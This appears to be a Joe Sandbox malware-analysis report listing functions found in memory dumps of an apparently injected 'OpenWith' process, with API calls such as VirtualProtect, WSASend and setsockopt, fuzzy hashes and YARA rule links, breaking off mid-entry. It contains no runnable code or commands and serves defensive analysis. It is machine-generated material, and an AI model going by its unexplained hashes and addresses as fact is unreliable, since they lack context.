
Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
Instruction ID: 18817dc8d0b48d41ae9e4f75c6f57722003a121cbabd61b16eda7e7b089be51d
Opcode Fuzzy Hash: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
Instruction Fuzzy Hash: 93212370A09C284FDF94EB5CC0C4D5A7BA2EF99720B6602E2D81AC719AD925ECC0C784

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6436A50 Relevance: 3.1, APIs: 2, Instructions: 89COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,-00000002,00007DF4B638382D,?,?,?,?,?,?,-00000002,00007DF4B63838CF), ref: 00007DF4B6436A7E
??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,-00000002,00007DF4B638382D,?,?,?,?,?,?,-00000002,00007DF4B63838CF), ref: 00007DF4B6436AA1

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 5204cd006ebb97b128dedf16bba74c8e00bea10f2ebc18799332b24ab1af1d5a
Instruction ID: bbefde6a18cff71ef36f7cc26c83d3605c99d09564d38fa8a50e9f8c95de5648
Opcode Fuzzy Hash: 5204cd006ebb97b128dedf16bba74c8e00bea10f2ebc18799332b24ab1af1d5a
Instruction Fuzzy Hash: 6C31DC34619C9A8FEF98FF58C4A5B6937A1EF94311F5440B9980BCA597CE28AC81C714

Uniqueness

Uniqueness Score: -1.00%

Function 000001BD757019A0 Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlRemoveVectoredExceptionHandler.NTDLL ref: 000001BD757019AD
VirtualFree.KERNELBASE ref: 000001BD757019E5

Memory Dump Source

Source File: 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001BD75700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1bd75700000_OpenWith.jbxd

Similarity

API ID: ExceptionFreeHandlerRemoveVectoredVirtual
String ID:
API String ID: 3082376348-0
Opcode ID: 68a2bebb63dec11ebeb4fbf40c1c95563ebbd08489d40e2effbc7ec76ba53b27
Instruction ID: af5a0ff6bff3f12ae6b9ad1f21b7032ea48b92b3ede330f6157c8b4c2c55d960
Opcode Fuzzy Hash: 68a2bebb63dec11ebeb4fbf40c1c95563ebbd08489d40e2effbc7ec76ba53b27
Instruction Fuzzy Hash: 54F01D31214A098FDF9CEF95D8D5EE133E4EB28305F4441698C0ACB156DE21D885C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6384550 Relevance: 2.4, APIs: 1, Instructions: 947COMMON

Download Yara Rule

APIs

_calloc_dbg.MSVCRT ref: 00007DF4B6384786

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: _calloc_dbg
String ID:
API String ID: 1170608187-0
Opcode ID: e90cc81eb408cc4c116749661e6ebe32c500f96c4223e82286aa9896b8545c58
Instruction ID: 561f46532101ca61917a13e3199c5efe53f26eb7bc0038a357a9e9cc8ac22000
Opcode Fuzzy Hash: e90cc81eb408cc4c116749661e6ebe32c500f96c4223e82286aa9896b8545c58
Instruction Fuzzy Hash: 6E72703151CA888BDB69EF58D481ADEB7E1FF94310F10566EE08F83297DE34E5458782

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6424280 Relevance: 2.2, APIs: 1, Instructions: 678COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B6424865

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: fc133317f941fabaca66a5444c4bcc2b3e8fa874fda3310f36a2e416026a1885
Instruction ID: 311fa3f5f09fcaf9c7995caedcc5366e7aad6e1cd0c0a343fb2128f443668a33
Opcode Fuzzy Hash: fc133317f941fabaca66a5444c4bcc2b3e8fa874fda3310f36a2e416026a1885
Instruction Fuzzy Hash: 8832A331A2CEC94EEB58DF98C0856A67BE1FF55310F6409AED08FC3597C628E8C58785

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B63869A8 Relevance: 1.9, APIs: 1, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007DF4B6386A4F

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: d91773ecd9077631960c3677d57c2977c0807724fdeaeb3262e240e1b5fd5702
Instruction ID: 7068075e397c40e09612e31e774220b506fc3d810feaa2b88cbb8523719c9953
Opcode Fuzzy Hash: d91773ecd9077631960c3677d57c2977c0807724fdeaeb3262e240e1b5fd5702
Instruction Fuzzy Hash: 24D1513061CA488FD758EF68D8959AAB7E1FF99310F10556EE48BC3262DF34E845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6441D6C Relevance: 1.9, APIs: 1, Instructions: 401COMMON

Download Yara Rule

APIs

_calloc_dbg.MSVCRT ref: 00007DF4B6441E57

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: _calloc_dbg
String ID:
API String ID: 1170608187-0
Opcode ID: abeff535319608a36932633bf7e230fa4690ffc4ae3c2294e127335d9ebc7ded
Instruction ID: 86c1a87b56e0824b292da44e7268b44128dae214582d34367271c336b217ed72
Opcode Fuzzy Hash: abeff535319608a36932633bf7e230fa4690ffc4ae3c2294e127335d9ebc7ded
Instruction Fuzzy Hash: 7AB10A3091CE584FD768EB5C84866BB77E1FB95324F60056FD88FC3183ED29E8864685

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6382E34 Relevance: 1.7, APIs: 1, Instructions: 245registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32 ref: 00007DF4B6383055

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: d8340601590ed8b71669f7c6d40f22125e0dc7ab3cfec3bbe45ed9527f2fef5b
Instruction ID: 90751f00fc5122e4b61b4967bab19b36a2f9f674feef3343d39e2acba89c1d02
Opcode Fuzzy Hash: d8340601590ed8b71669f7c6d40f22125e0dc7ab3cfec3bbe45ed9527f2fef5b
Instruction Fuzzy Hash: BA91BC7151CB888FE764EF68C489B9AB7E1FB98311F10492EE48EC3261DB34D545CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B63B1F58 Relevance: 1.7, APIs: 1, Instructions: 227networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32 ref: 00007DF4B63B200F

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: e6bbb75cfcada6243a44a272e57bf7ceaccf3902ad7b4c735c76777bdf036997
Instruction ID: 7dbf134c5e05df5040ad36be5fd3f3a4329eb131580ae8673016828bcbc68bcd
Opcode Fuzzy Hash: e6bbb75cfcada6243a44a272e57bf7ceaccf3902ad7b4c735c76777bdf036997
Instruction Fuzzy Hash: 6E81A270508E498FEB98DF68C4847A6BBE4FF54324F1442AAD80FC7652DB35E841CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B63741D8 Relevance: 1.7, APIs: 1, Instructions: 203COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE ref: 00007DF4B6374395

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 7301991a55ae90a18fd8a2167234c9b178d7ebdeea410f897018aea7b1691faa
Instruction ID: 42c55c3ee7d361f2cd496586d4024cd4f59e6ee8bf9bb7928a1e7d9d533b2953
Opcode Fuzzy Hash: 7301991a55ae90a18fd8a2167234c9b178d7ebdeea410f897018aea7b1691faa
Instruction Fuzzy Hash: 86615E7150CA888BE765EF64D8946EBBBE1FB94310F404A6EE08FC3152DF39A545CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B63B1950 Relevance: 1.7, APIs: 1, Instructions: 167networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32 ref: 00007DF4B63B19EF

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: 6b887d4ee2da175949f8e81a0e65e3d063e47abc8ee875f5d1071da8520f6cd7
Instruction ID: 274f55cbc9713f23b0200b001c5c02c9cf3742ea858cd0c1d5983ac0cc470d5f
Opcode Fuzzy Hash: 6b887d4ee2da175949f8e81a0e65e3d063e47abc8ee875f5d1071da8520f6cd7
Instruction Fuzzy Hash: FE513A70618A898FEBA4DF68C488B967BF4FF54324F5405AAD44FC3562EB39E844CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6376478 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4B6374EE8: VirtualProtect.KERNELBASE ref: 00007DF4B6374F48
Part of subcall function 00007DF4B6374EE8: VirtualProtect.KERNELBASE ref: 00007DF4B6374F71
Part of subcall function 00007DF4B6374EE8: VirtualProtect.KERNELBASE ref: 00007DF4B6374F8D
Part of subcall function 00007DF4B6374EE8: VirtualProtect.KERNELBASE ref: 00007DF4B6374FB8

TlsFree.KERNELBASE(?,?,?,?,?,?,?,00000000,?,?,00000000,00007DF4B637220C), ref: 00007DF4B63765B3

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ProtectVirtual$Free
String ID:
API String ID: 3841229516-0
Opcode ID: 5a5076ee5687eff1dc103e3f39fba0ea38ea43aa56cb8851756aaefb7e695dca
Instruction ID: 479f93c0b6dfec7aca029b841ff88744e5e50e6e79caa3c95aa5ceb57c4eafc4
Opcode Fuzzy Hash: 5a5076ee5687eff1dc103e3f39fba0ea38ea43aa56cb8851756aaefb7e695dca
Instruction Fuzzy Hash: 3141BA3060CA584FEB54EB68D4D59797BA1FF45720B0055BAE41FC728BDE28FC408B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6363410 Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007DF4B63634DF

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg
String ID:
API String ID: 1527718024-0
Opcode ID: cc4326c6841866a6755c31003428b424b06f8f10db791a6fd7561e0a70c8a8fc
Instruction ID: da2ec86db09a9c5dd927e4e649375e328a028b6d0a4f7c29dad40bf5a13506de
Opcode Fuzzy Hash: cc4326c6841866a6755c31003428b424b06f8f10db791a6fd7561e0a70c8a8fc
Instruction Fuzzy Hash: EA411730A0C4584BFB6DDE6988D503A7BF1EF8031171461FBC85BCB18BDA29E946C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6372110 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4B6362BD4: RtlAddFunctionTable.KERNEL32 ref: 00007DF4B6362C01

SetErrorMode.KERNELBASE ref: 00007DF4B63721F8

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ErrorFunctionModeTable
String ID:
API String ID: 928017140-0
Opcode ID: 3093e2713d4c83f778b6f58d544e1c428f7102d517b3c9af48ca3ee171aa4d06
Instruction ID: 6a157e5652ec4ecb8c8cef40393a4a4bbc699a7d270488f82600681e2a1687d7
Opcode Fuzzy Hash: 3093e2713d4c83f778b6f58d544e1c428f7102d517b3c9af48ca3ee171aa4d06
Instruction Fuzzy Hash: 34317321A1C9884BEB64BB9898C297A36E1FB48320B5415BEE50FC32D3D919ED858741

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B63B2700 Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007DF4B63B2774

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 405079254f4dbac4a13797b27ee38af6170be3b6057a9a13f7f6cbe7f380fdd3
Instruction ID: 10f4199bc2850f8add3983ae417dbcba731885544ec9654e0e4223b750b04a1b
Opcode Fuzzy Hash: 405079254f4dbac4a13797b27ee38af6170be3b6057a9a13f7f6cbe7f380fdd3
Instruction Fuzzy Hash: FD311D70608A458FEB98DF58C0C8B617BE5FF54325F2453AAD81ACB2D7D7749882CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000001BD7570185C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessMitigationPolicy.KERNELBASE ref: 000001BD7570192F

Memory Dump Source

Source File: 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001BD75700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1bd75700000_OpenWith.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 04359cd7b97b11c476e8c0617afcaa098c35e265ec660168a6fbd24c0647ca60
Instruction ID: abec4fa1affb7b7acd7ab02ad92b445c278b3fda5c1aca71a97e901ebc302188
Opcode Fuzzy Hash: 04359cd7b97b11c476e8c0617afcaa098c35e265ec660168a6fbd24c0647ca60
Instruction Fuzzy Hash: 3931A730120A864BFF6D9764AC88BE173D5EB943ADFD802B9A119C61D1FFB1D841C782

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6381570 Relevance: 1.6, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF4B63A00C6), ref: 00007DF4B638158F

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg
String ID:
API String ID: 1527718024-0
Opcode ID: 85d54cad85ff47129ab9247bbc33c91055469bc84fa60e6ee8ad48e3f09910ee
Instruction ID: bf1d9a03c41885bb447cda880dcc3000fec4f880b2f13bcbf64855e5ac6fe127
Opcode Fuzzy Hash: 85d54cad85ff47129ab9247bbc33c91055469bc84fa60e6ee8ad48e3f09910ee
Instruction Fuzzy Hash: 5C21A571614E0C8FDF48EF5CD88C6A577E5FB6831171441ABD80ECB265DA34E985C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6384484 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B6384541

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 3adb1af045a857eedabd1a5fb2c5f83d930a0cc5c4d338f8207a2e6a29b170a8
Instruction ID: ba89a310f76f408b2052843f93341e6009d06a466cc70273b25a665d8a1637a2
Opcode Fuzzy Hash: 3adb1af045a857eedabd1a5fb2c5f83d930a0cc5c4d338f8207a2e6a29b170a8
Instruction Fuzzy Hash: D3213331609A488FDF94EF68D845AAE7BE0EF54325F00566AF84ED3151CB38E940CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6383800 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4B6436A50: ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,-00000002,00007DF4B638382D,?,?,?,?,?,?,-00000002,00007DF4B63838CF), ref: 00007DF4B6436A7E
Part of subcall function 00007DF4B6436A50: ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,-00000002,00007DF4B638382D,?,?,?,?,?,?,-00000002,00007DF4B63838CF), ref: 00007DF4B6436AA1

Part of subcall function 00007DF4B63814C4: ??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B63814ED

Part of subcall function 00007DF4B6381510: ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00007DF4B63763F9), ref: 00007DF4B6381526

??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,-00000002,00007DF4B63838CF,?,?,?,?,?,?,-00000002,00007DF4B6383BCD), ref: 00007DF4B638385A

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 976b24944f800893ac3e28ff58638d770299f3efb64662e13508844ff367e56c
Instruction ID: 0518611e94302ed4966610a3e305c29101559a7b3544e3939eee3645a9575740
Opcode Fuzzy Hash: 976b24944f800893ac3e28ff58638d770299f3efb64662e13508844ff367e56c
Instruction Fuzzy Hash: 95110D31514C494FEB89EB58C494BEAB7B1FF94320F5412EAD80EC7197DB38A986C780

Uniqueness

Uniqueness Score: -1.00%

Function 000001BD75865394 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 000001BD758653E5

Memory Dump Source

Source File: 00000014.00000003.2319903154.000001BD75860000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001BD75860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_1bd75860000_OpenWith.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
Instruction ID: 93cd215b1fb03fd649c6a57e1d9dea03ef10047416e045a87754f284c859ac0f
Opcode Fuzzy Hash: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
Instruction Fuzzy Hash: B2018F70610E055BE76C9B38E8987B6B3E1FB58319F840669E45AC7282EF64EC91C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B637B064 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4B6389AF4: _malloc_dbg.MSVCRT ref: 00007DF4B6389B1A
Part of subcall function 00007DF4B6389AF4: NtAcceptConnectPort.NTDLL ref: 00007DF4B6389BC3

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B637B0C2

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ??3@AcceptConnectPort_malloc_dbg
String ID:
API String ID: 1485176176-0
Opcode ID: 7e0ab1111397d507d7881f8866247adeba30b7f5dcd171a7b7908f5c06eb3e7a
Instruction ID: f50cd8c1871019e11d2e1da6e1345510e68bae415e86c70248d4a17e2593e5a1
Opcode Fuzzy Hash: 7e0ab1111397d507d7881f8866247adeba30b7f5dcd171a7b7908f5c06eb3e7a
Instruction Fuzzy Hash: 61F0C831218D0C4FD788EB5D9C8C9B63BE5EBD8721744427AE00BC72A5DE68D9458780

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B637A124 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,-00000001,00007DF4B637B707), ref: 00007DF4B637A16B

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 615d3ef31dc39e001ccb32ef45f5c84ddeb3600274fc1f206aae9d940679b753
Instruction ID: 40bffcbd0f3f914c123fad12931a22c8e409e09df095e7b6ed3ac55a0f204d91
Opcode Fuzzy Hash: 615d3ef31dc39e001ccb32ef45f5c84ddeb3600274fc1f206aae9d940679b753
Instruction Fuzzy Hash: 6101FB3070880C8FDF84EB1CC4D4E6573E5EB69324B6405A6D44ECB246CA25EC82CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6365330 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT(?,?,?,?,-00000001,?,-00000001,00007DF4B63653BE), ref: 00007DF4B6365375

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg
String ID:
API String ID: 1527718024-0
Opcode ID: 051b47b6163c57a56397831363f2f208832c5eccc5cbea97d62df897e1ee0233
Instruction ID: e5dfac8a7640e670e077199fdd333b5d8bcecd34cd5b9cd076818be6ba000639
Opcode Fuzzy Hash: 051b47b6163c57a56397831363f2f208832c5eccc5cbea97d62df897e1ee0233
Instruction Fuzzy Hash: 94018171B08E065BE7689B69D888726B6E1FB98331F18467AD409C3281DB78E891C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6381510 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00007DF4B63763F9), ref: 00007DF4B6381526

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: d40400de8aff203246a65c93b039d135a7c4bde247e9e33ef195e3f9dc3e5471
Instruction ID: 55243547061ace6212235ff84e93788ab86d3e2f68115948fc9f13ebb5cde93d
Opcode Fuzzy Hash: d40400de8aff203246a65c93b039d135a7c4bde247e9e33ef195e3f9dc3e5471
Instruction Fuzzy Hash: 46F06730615E4B8FEB88EF69D4887A17BE0FB68319F6000BAC40EC32A0C7799890C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B63BD6EC Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT(?,?,?,?,00000000,00000000), ref: 00007DF4B63BD732

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 477c6fbf3943f877d88929c3287f51d47fe487078bb79bd2b27da6bea03aeec5
Instruction ID: bc9d3e4ac9bf0239ba3ccb11984f45ecddcdf2d622ea28072f656f2d68c1f610
Opcode Fuzzy Hash: 477c6fbf3943f877d88929c3287f51d47fe487078bb79bd2b27da6bea03aeec5
Instruction Fuzzy Hash: 99F0443071B90A8BFF5C6BB5A85926937A4EF24316B04203FD807C21A1CF6C9840D722

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6362178 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNELBASE ref: 00007DF4B63621BE

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: DestroyHeap
String ID:
API String ID: 2435110975-0
Opcode ID: 53ef2cf4c624f8d13d0a6f534f041d9c86cf4983b70d579de2bd58a17e54e5cf
Instruction ID: 5c97c863cf5d1670407fedd0a03e9fabfc87f99f754a7c13303f0388f92e4f61
Opcode Fuzzy Hash: 53ef2cf4c624f8d13d0a6f534f041d9c86cf4983b70d579de2bd58a17e54e5cf
Instruction Fuzzy Hash: 42014F70A0C6458FDB50AFAAFCD55267BF1FB88320B4504BFE15AC26A2CE395A84C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6362124 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 00007DF4B6362144

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 7a3e711983133c84745abeac61ff9bae0bae1902e442caba6f883a349e05e13e
Instruction ID: c1b6601656545dd41c30ec9994efe00256d570ead86873b7c03397e9ee3b3fa0
Opcode Fuzzy Hash: 7a3e711983133c84745abeac61ff9bae0bae1902e442caba6f883a349e05e13e
Instruction Fuzzy Hash: 26F0E521F0C1448FE720AFFA6CD112B39A1FB84331F16A5BBD20BC21C2C83E99829310

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6383474 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007DF4B63834BF

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 93a4616800550b85056b3bfca5b27a1e2e5fff5011940eb12dbaf61b78639e47
Instruction ID: bb91e3c43790e3b073583ec6f43f3f09cfcd1482d6bd040ffa04971270e9e493
Opcode Fuzzy Hash: 93a4616800550b85056b3bfca5b27a1e2e5fff5011940eb12dbaf61b78639e47
Instruction Fuzzy Hash: 35F08C742049048BEB48EFACC488B6677E2FFA8325F100169E90EC72E4DB368989C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6371E78 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

